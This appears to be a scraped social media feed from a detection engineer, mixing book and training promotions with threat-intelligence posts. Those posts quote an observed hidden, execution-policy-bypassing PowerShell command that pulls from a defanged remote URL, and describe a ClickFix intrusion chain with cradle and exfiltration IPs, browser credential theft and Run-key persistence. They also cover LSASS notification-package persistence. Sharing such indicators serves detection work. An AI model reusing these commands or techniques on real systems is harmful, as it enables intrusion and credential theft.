KoifSec

I wrote a book! A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering. Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to. koifsec.medium.com/my-book-a-danc… amazon.com/dp/B0GT1LQHF6

@m45c07 Thank you brother, glad you enjoyed!

@KoifSec I am almost finished with this one, at the very first I was only confused due to the fact only questions were stated without answer to them, however as I progressed through the book and started thinking, the stuff clicked. Highly recommend this one for people in the field.

I wrote a book! A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering. Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to. koifsec.medium.com/my-book-a-danc… amazon.com/dp/B0GT1LQHF6

Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it. @HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub. The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog. Thanks @KoifSec for the contribution. 🫡 🔗 lolrmm.io/tools/komari 🧩 github.com/magicsword-io/… 📖 huntress.com/blog/komari-c2…

Published a new post right now on DetectFYI: "The Life-Dinner Principle in Detection", continuing from the latest post about arms race dynamics. Enjoy! detect.fyi/the-life-dinne…

@SecurityAura Same vibes as

C:\ProgramData\wt.exe All I have to say. This is a fucking meme at this point. IYKYK.

Found a TP today from the Axios incident. The observed command was: C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000 wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.

Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/introduci…

@Kostastsale I had the pleasure of beta testing this, highly recommended if this is something you're interested in. Everything Kostas does is worth looking into!

New post out! "The Red Queen’s Race: Arms Race Dynamics in Threat Detection" @koifsec/the-red-queens-race-arms-race-dynamics-in-threat-detection-4f532a149fda" target="_blank" rel="nofollow noopener">medium.com/@koifsec/the-r…

@itsJaimeMedina Great writeup! gonna start testing it out for myself 🙂

Lots of talk about AI coding workflows. Not a lot of "here's exactly how I do it." I'm sharing my exact workflow for using 3 different ai agents (claude code, codex, gemini) build, challenge, and fix each other's work. Nothing fancy, just plain vanilla cli communication to ship features for @FileGrabLink , so lets break it down in this thread:

New post out! detect.fyi/the-invisible-…

If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - deps.sh - completely usable from the CLI as well. Enjoy!

LSASS DLL loading can be abused to establish persistence inside a highly privileged system process. This registry modification alters the Notification Packages value under the LSA key, causing LSASS to load additional packages at startup. Any unexpected LSA Notification Packages entry should be treated as suspicious. hackers-arise.com/advanced-windo… @three_cube @_aircorridor @DI0256 #redteam #DFIR #blueteam #pentest

@ThruntingLabs I was one of the lucky firsts - I HIGHLY recommend trying this out if you get the chance - this one is different.

We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far!🙏 We will invite the second wave early next week! Thank you to everyone who is providing feedback!

@DfirDiva @13CubedDFIR Investigating Windows Endpoints

📣 I partnered with @13CubedDFIR for a Valentine's Day Giveaway! 🎁 🏆 1 Grand Prize winner will receive one course of their choice from the list below + a 13Cubed Investigator T-Shirt. Courses: - Investigating Windows Endpoints - Investigating Windows Memory - Investigating macOS Endpoints - Investigating Linux Devices Each course comes with a Certificate of Completion as well as Certification attempts. 👕 5 winners will receive 13Cubed Investigator T-Shirts. To Enter: ✅ Like ✅ Comment with the name of the course you want to win ✅ Repost On Valentine's Day (February 14th, 2026) entries from across three social media platforms will be combined and winners will be selected. For more info check out: 13Cubed Courses: training.13cubed.com Certification Information: training.13cubed.com/certifications T-Shirts: shop.13cubed.com #DFIR #DigitalForensics #IncidentResponse

Introducing the "Adversarial Detection Engineering (ADE) Framework" ! Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code. github.com/NikolasBielski… adeframework.org

I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques. Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: virustotal.com/gui/file/81f9a… PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging. PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading… explorer.exe └─ powershell.exe -nop -w hidden └─ msiexec.exe s1161271080.msi └─ S_Circuitr.exe └─ PlaneV128.exe (GhostPulse) ├─ chrome.exe --headless ├─ msedge.exe --headless └─ msiexec.exe sup.msi └─ superintendent.exe Signed executables using ZONER/Crisp IM certificates observed throughout the chain. Links: • joesandbox.com/analysis/18627… • tria.ge/260205-ce1n5sd… • bazaar.abuse.ch/sample/d63f35e… Hunt for PowerShell cradles paired with --headless browser launches. What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out. cc @malwrhunterteam

New post out! "Move and Countermove: Game Theory Aspects of Detection Engineering" koifsec.medium.com/move-and-count…

#GoreloRMM being pushed via a suspected email phishing campaign where the URL leads the user to a site with a "Download Proposal" button. This downloads a raw Gorelo installer. Same lure/tactic used as another campaign at the beginning of the month that pushed #ImmyBot. VT next